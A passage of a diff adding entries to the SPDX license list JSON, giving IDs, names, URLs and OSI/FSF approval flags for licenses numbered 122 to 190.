+ "reference": "https://spdx.org/licenses/ECL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/ECL-1.0.json",
+ "referenceNumber": 122,
+ "name": "Educational Community License v1.0",
+ "licenseId": "ECL-1.0",
+ "seeAlso": [
+ "https://opensource.org/licenses/ECL-1.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/OFL-1.0-no-RFN.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OFL-1.0-no-RFN.json",
+ "referenceNumber": 123,
+ "name": "SIL Open Font License 1.0 with no Reserved Font Name",
+ "licenseId": "OFL-1.0-no-RFN",
+ "seeAlso": [
+ "http://scripts.sil.org/cms/scripts/page.php?item_id\u003dOFL10_web"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-NC-SA-3.0-DE.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-SA-3.0-DE.json",
+ "referenceNumber": 124,
+ "name": "Creative Commons Attribution Non Commercial Share Alike 3.0 Germany",
+ "licenseId": "CC-BY-NC-SA-3.0-DE",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nc-sa/3.0/de/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-SA-3.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-SA-3.0.json",
+ "referenceNumber": 125,
+ "name": "Creative Commons Attribution Share Alike 3.0 Unported",
+ "licenseId": "CC-BY-SA-3.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-sa/3.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/NTP.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/NTP.json",
+ "referenceNumber": 126,
+ "name": "NTP License",
+ "licenseId": "NTP",
+ "seeAlso": [
+ "https://opensource.org/licenses/NTP"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/MPL-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/MPL-2.0.json",
+ "referenceNumber": 127,
+ "name": "Mozilla Public License 2.0",
+ "licenseId": "MPL-2.0",
+ "seeAlso": [
+ "https://www.mozilla.org/MPL/2.0/",
+ "https://opensource.org/licenses/MPL-2.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/APSL-1.2.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/APSL-1.2.json",
+ "referenceNumber": 128,
+ "name": "Apple Public Source License 1.2",
+ "licenseId": "APSL-1.2",
+ "seeAlso": [
+ "http://www.samurajdata.se/opensource/mirror/licenses/apsl.php"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/GFDL-1.2-no-invariants-only.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GFDL-1.2-no-invariants-only.json",
+ "referenceNumber": 129,
+ "name": "GNU Free Documentation License v1.2 only - no invariants",
+ "licenseId": "GFDL-1.2-no-invariants-only",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/fdl-1.2.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Artistic-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Artistic-2.0.json",
+ "referenceNumber": 130,
+ "name": "Artistic License 2.0",
+ "licenseId": "Artistic-2.0",
+ "seeAlso": [
+ "http://www.perlfoundation.org/artistic_license_2_0",
+ "https://www.perlfoundation.org/artistic-license-20.html",
+ "https://opensource.org/licenses/artistic-license-2.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/GPL-2.0.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/GPL-2.0.json",
+ "referenceNumber": 131,
+ "name": "GNU General Public License v2.0 only",
+ "licenseId": "GPL-2.0",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html",
+ "https://opensource.org/licenses/GPL-2.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/RSCPL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/RSCPL.json",
+ "referenceNumber": 132,
+ "name": "Ricoh Source Code Public License",
+ "licenseId": "RSCPL",
+ "seeAlso": [
+ "http://wayback.archive.org/web/20060715140826/http://www.risource.org/RPL/RPL-1.0A.shtml",
+ "https://opensource.org/licenses/RSCPL"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Sleepycat.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Sleepycat.json",
+ "referenceNumber": 133,
+ "name": "Sleepycat License",
+ "licenseId": "Sleepycat",
+ "seeAlso": [
+ "https://opensource.org/licenses/Sleepycat"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/xpp.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/xpp.json",
+ "referenceNumber": 134,
+ "name": "XPP License",
+ "licenseId": "xpp",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/xpp"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CDLA-Sharing-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CDLA-Sharing-1.0.json",
+ "referenceNumber": 135,
+ "name": "Community Data License Agreement Sharing 1.0",
+ "licenseId": "CDLA-Sharing-1.0",
+ "seeAlso": [
+ "https://cdla.io/sharing-1-0"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/ClArtistic.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/ClArtistic.json",
+ "referenceNumber": 136,
+ "name": "Clarified Artistic License",
+ "licenseId": "ClArtistic",
+ "seeAlso": [
+ "http://gianluca.dellavedova.org/2011/01/03/clarified-artistic-license/",
+ "http://www.ncftp.com/ncftp/doc/LICENSE.txt"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/AGPL-1.0-only.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/AGPL-1.0-only.json",
+ "referenceNumber": 137,
+ "name": "Affero General Public License v1.0 only",
+ "licenseId": "AGPL-1.0-only",
+ "seeAlso": [
+ "http://www.affero.org/oagpl.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-3.0-DE.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-3.0-DE.json",
+ "referenceNumber": 138,
+ "name": "Creative Commons Attribution 3.0 Germany",
+ "licenseId": "CC-BY-3.0-DE",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by/3.0/de/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/AFL-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/AFL-2.0.json",
+ "referenceNumber": 139,
+ "name": "Academic Free License v2.0",
+ "licenseId": "AFL-2.0",
+ "seeAlso": [
+ "http://wayback.archive.org/web/20060924134533/http://www.opensource.org/licenses/afl-2.0.txt"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Intel.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Intel.json",
+ "referenceNumber": 140,
+ "name": "Intel Open Source License",
+ "licenseId": "Intel",
+ "seeAlso": [
+ "https://opensource.org/licenses/Intel"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/GFDL-1.1-no-invariants-or-later.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GFDL-1.1-no-invariants-or-later.json",
+ "referenceNumber": 141,
+ "name": "GNU Free Documentation License v1.1 or later - no invariants",
+ "licenseId": "GFDL-1.1-no-invariants-or-later",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/fdl-1.1.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/APAFML.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/APAFML.json",
+ "referenceNumber": 142,
+ "name": "Adobe Postscript AFM License",
+ "licenseId": "APAFML",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/AdobePostscriptAFM"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GFDL-1.2.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/GFDL-1.2.json",
+ "referenceNumber": 143,
+ "name": "GNU Free Documentation License v1.2",
+ "licenseId": "GFDL-1.2",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/fdl-1.2.txt"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/SISSL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/SISSL.json",
+ "referenceNumber": 144,
+ "name": "Sun Industry Standards Source License v1.1",
+ "licenseId": "SISSL",
+ "seeAlso": [
+ "http://www.openoffice.org/licenses/sissl_license.html",
+ "https://opensource.org/licenses/SISSL"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Naumen.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Naumen.json",
+ "referenceNumber": 145,
+ "name": "Naumen Public License",
+ "licenseId": "Naumen",
+ "seeAlso": [
+ "https://opensource.org/licenses/Naumen"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/HTMLTIDY.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/HTMLTIDY.json",
+ "referenceNumber": 146,
+ "name": "HTML Tidy License",
+ "licenseId": "HTMLTIDY",
+ "seeAlso": [
+ "https://github.com/htacg/tidy-html5/blob/next/README/LICENSE.md"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OLDAP-2.8.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OLDAP-2.8.json",
+ "referenceNumber": 147,
+ "name": "Open LDAP Public License v2.8",
+ "licenseId": "OLDAP-2.8",
+ "seeAlso": [
+ "http://www.openldap.org/software/release/license.html"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/blessing.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/blessing.json",
+ "referenceNumber": 148,
+ "name": "SQLite Blessing",
+ "licenseId": "blessing",
+ "seeAlso": [
+ "https://www.sqlite.org/src/artifact/e33a4df7e32d742a?ln\u003d4-9",
+ "https://sqlite.org/src/artifact/df5091916dbb40e6"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-ND-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-ND-2.0.json",
+ "referenceNumber": 149,
+ "name": "Creative Commons Attribution No Derivatives 2.0 Generic",
+ "licenseId": "CC-BY-ND-2.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nd/2.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OGTSL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OGTSL.json",
+ "referenceNumber": 150,
+ "name": "Open Group Test Suite License",
+ "licenseId": "OGTSL",
+ "seeAlso": [
+ "http://www.opengroup.org/testing/downloads/The_Open_Group_TSL.txt",
+ "https://opensource.org/licenses/OGTSL"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/LGPL-2.0-or-later.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/LGPL-2.0-or-later.json",
+ "referenceNumber": 151,
+ "name": "GNU Library General Public License v2 or later",
+ "licenseId": "LGPL-2.0-or-later",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/lgpl-2.0-standalone.html"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Parity-7.0.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Parity-7.0.0.json",
+ "referenceNumber": 152,
+ "name": "The Parity Public License 7.0.0",
+ "licenseId": "Parity-7.0.0",
+ "seeAlso": [
+ "https://paritylicense.com/versions/7.0.0.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-ND-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-ND-1.0.json",
+ "referenceNumber": 153,
+ "name": "Creative Commons Attribution No Derivatives 1.0 Generic",
+ "licenseId": "CC-BY-ND-1.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nd/1.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/dvipdfm.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/dvipdfm.json",
+ "referenceNumber": 154,
+ "name": "dvipdfm License",
+ "licenseId": "dvipdfm",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/dvipdfm"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CNRI-Python.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CNRI-Python.json",
+ "referenceNumber": 155,
+ "name": "CNRI Python License",
+ "licenseId": "CNRI-Python",
+ "seeAlso": [
+ "https://opensource.org/licenses/CNRI-Python"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSD-4-Clause-UC.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BSD-4-Clause-UC.json",
+ "referenceNumber": 156,
+ "name": "BSD-4-Clause (University of California-Specific)",
+ "licenseId": "BSD-4-Clause-UC",
+ "seeAlso": [
+ "http://www.freebsd.org/copyright/license.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/NLOD-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/NLOD-1.0.json",
+ "referenceNumber": 157,
+ "name": "Norwegian Licence for Open Government Data (NLOD) 1.0",
+ "licenseId": "NLOD-1.0",
+ "seeAlso": [
+ "http://data.norge.no/nlod/en/1.0"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/MS-RL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/MS-RL.json",
+ "referenceNumber": 158,
+ "name": "Microsoft Reciprocal License",
+ "licenseId": "MS-RL",
+ "seeAlso": [
+ "http://www.microsoft.com/opensource/licenses.mspx",
+ "https://opensource.org/licenses/MS-RL"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-NC-SA-4.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-SA-4.0.json",
+ "referenceNumber": 159,
+ "name": "Creative Commons Attribution Non Commercial Share Alike 4.0 International",
+ "licenseId": "CC-BY-NC-SA-4.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nc-sa/4.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/HaskellReport.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/HaskellReport.json",
+ "referenceNumber": 160,
+ "name": "Haskell Language Report License",
+ "licenseId": "HaskellReport",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Haskell_Language_Report_License"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-1.0.json",
+ "referenceNumber": 161,
+ "name": "Creative Commons Attribution 1.0 Generic",
+ "licenseId": "CC-BY-1.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by/1.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/UCL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/UCL-1.0.json",
+ "referenceNumber": 162,
+ "name": "Upstream Compatibility License v1.0",
+ "licenseId": "UCL-1.0",
+ "seeAlso": [
+ "https://opensource.org/licenses/UCL-1.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Mup.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Mup.json",
+ "referenceNumber": 163,
+ "name": "Mup License",
+ "licenseId": "Mup",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Mup"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/SMPPL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/SMPPL.json",
+ "referenceNumber": 164,
+ "name": "Secure Messaging Protocol Public License",
+ "licenseId": "SMPPL",
+ "seeAlso": [
+ "https://github.com/dcblake/SMP/blob/master/Documentation/License.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/PHP-3.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/PHP-3.0.json",
+ "referenceNumber": 165,
+ "name": "PHP License v3.0",
+ "licenseId": "PHP-3.0",
+ "seeAlso": [
+ "http://www.php.net/license/3_0.txt",
+ "https://opensource.org/licenses/PHP-3.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/GL2PS.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GL2PS.json",
+ "referenceNumber": 166,
+ "name": "GL2PS License",
+ "licenseId": "GL2PS",
+ "seeAlso": [
+ "http://www.geuz.org/gl2ps/COPYING.GL2PS"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CrystalStacker.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CrystalStacker.json",
+ "referenceNumber": 167,
+ "name": "CrystalStacker License",
+ "licenseId": "CrystalStacker",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing:CrystalStacker?rd\u003dLicensing/CrystalStacker"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/W3C-20150513.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/W3C-20150513.json",
+ "referenceNumber": 168,
+ "name": "W3C Software Notice and Document License (2015-05-13)",
+ "licenseId": "W3C-20150513",
+ "seeAlso": [
+ "https://www.w3.org/Consortium/Legal/2015/copyright-software-and-document"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/NIST-PD-fallback.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/NIST-PD-fallback.json",
+ "referenceNumber": 169,
+ "name": "NIST Public Domain Notice with license fallback",
+ "licenseId": "NIST-PD-fallback",
+ "seeAlso": [
+ "https://github.com/usnistgov/jsip/blob/59700e6926cbe96c5cdae897d9a7d2656b42abe3/LICENSE",
+ "https://github.com/usnistgov/fipy/blob/86aaa5c2ba2c6f1be19593c5986071cf6568cc34/LICENSE.rst"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OGL-UK-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OGL-UK-1.0.json",
+ "referenceNumber": 170,
+ "name": "Open Government Licence v1.0",
+ "licenseId": "OGL-UK-1.0",
+ "seeAlso": [
+ "http://www.nationalarchives.gov.uk/doc/open-government-licence/version/1/"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CPL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CPL-1.0.json",
+ "referenceNumber": 171,
+ "name": "Common Public License 1.0",
+ "licenseId": "CPL-1.0",
+ "seeAlso": [
+ "https://opensource.org/licenses/CPL-1.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/LGPL-2.1-only.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/LGPL-2.1-only.json",
+ "referenceNumber": 172,
+ "name": "GNU Lesser General Public License v2.1 only",
+ "licenseId": "LGPL-2.1-only",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html",
+ "https://opensource.org/licenses/LGPL-2.1"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/ZPL-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/ZPL-2.0.json",
+ "referenceNumber": 173,
+ "name": "Zope Public License 2.0",
+ "licenseId": "ZPL-2.0",
+ "seeAlso": [
+ "http://old.zope.org/Resources/License/ZPL-2.0",
+ "https://opensource.org/licenses/ZPL-2.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Frameworx-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Frameworx-1.0.json",
+ "referenceNumber": 174,
+ "name": "Frameworx Open License 1.0",
+ "licenseId": "Frameworx-1.0",
+ "seeAlso": [
+ "https://opensource.org/licenses/Frameworx-1.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/AGPL-3.0-only.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/AGPL-3.0-only.json",
+ "referenceNumber": 175,
+ "name": "GNU Affero General Public License v3.0 only",
+ "licenseId": "AGPL-3.0-only",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/agpl.txt",
+ "https://opensource.org/licenses/AGPL-3.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/DRL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/DRL-1.0.json",
+ "referenceNumber": 176,
+ "name": "Detection Rule License 1.0",
+ "licenseId": "DRL-1.0",
+ "seeAlso": [
+ "https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/EFL-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/EFL-2.0.json",
+ "referenceNumber": 177,
+ "name": "Eiffel Forum License v2.0",
+ "licenseId": "EFL-2.0",
+ "seeAlso": [
+ "http://www.eiffel-nice.org/license/eiffel-forum-license-2.html",
+ "https://opensource.org/licenses/EFL-2.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Spencer-99.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Spencer-99.json",
+ "referenceNumber": 178,
+ "name": "Spencer License 99",
+ "licenseId": "Spencer-99",
+ "seeAlso": [
+ "http://www.opensource.apple.com/source/tcl/tcl-5/tcl/generic/regfronts.c"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CAL-1.0-Combined-Work-Exception.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CAL-1.0-Combined-Work-Exception.json",
+ "referenceNumber": 179,
+ "name": "Cryptographic Autonomy License 1.0 (Combined Work Exception)",
+ "licenseId": "CAL-1.0-Combined-Work-Exception",
+ "seeAlso": [
+ "http://cryptographicautonomylicense.com/license-text.html",
+ "https://opensource.org/licenses/CAL-1.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/GFDL-1.1-invariants-only.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GFDL-1.1-invariants-only.json",
+ "referenceNumber": 180,
+ "name": "GNU Free Documentation License v1.1 only - invariants",
+ "licenseId": "GFDL-1.1-invariants-only",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/fdl-1.1.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/TCL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/TCL.json",
+ "referenceNumber": 181,
+ "name": "TCL/TK License",
+ "licenseId": "TCL",
+ "seeAlso": [
+ "http://www.tcl.tk/software/tcltk/license.html",
+ "https://fedoraproject.org/wiki/Licensing/TCL"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/SHL-0.5.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/SHL-0.5.json",
+ "referenceNumber": 182,
+ "name": "Solderpad Hardware License v0.5",
+ "licenseId": "SHL-0.5",
+ "seeAlso": [
+ "https://solderpad.org/licenses/SHL-0.5/"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OFL-1.0-RFN.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OFL-1.0-RFN.json",
+ "referenceNumber": 183,
+ "name": "SIL Open Font License 1.0 with Reserved Font Name",
+ "licenseId": "OFL-1.0-RFN",
+ "seeAlso": [
+ "http://scripts.sil.org/cms/scripts/page.php?item_id\u003dOFL10_web"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/LGPL-2.0.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/LGPL-2.0.json",
+ "referenceNumber": 184,
+ "name": "GNU Library General Public License v2 only",
+ "licenseId": "LGPL-2.0",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/lgpl-2.0-standalone.html"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CERN-OHL-W-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CERN-OHL-W-2.0.json",
+ "referenceNumber": 185,
+ "name": "CERN Open Hardware Licence Version 2 - Weakly Reciprocal",
+ "licenseId": "CERN-OHL-W-2.0",
+ "seeAlso": [
+ "https://www.ohwr.org/project/cernohl/wikis/Documents/CERN-OHL-version-2"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Glide.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Glide.json",
+ "referenceNumber": 186,
+ "name": "3dfx Glide License",
+ "licenseId": "Glide",
+ "seeAlso": [
+ "http://www.users.on.net/~triforce/glidexp/COPYING.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/mpich2.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/mpich2.json",
+ "referenceNumber": 187,
+ "name": "mpich2 License",
+ "licenseId": "mpich2",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/MIT"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/psutils.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/psutils.json",
+ "referenceNumber": 188,
+ "name": "psutils License",
+ "licenseId": "psutils",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/psutils"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/SPL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/SPL-1.0.json",
+ "referenceNumber": 189,
+ "name": "Sun Public License v1.0",
+ "licenseId": "SPL-1.0",
+ "seeAlso": [
+ "https://opensource.org/licenses/SPL-1.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Apache-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Apache-1.1.json",
+ "referenceNumber": 190,
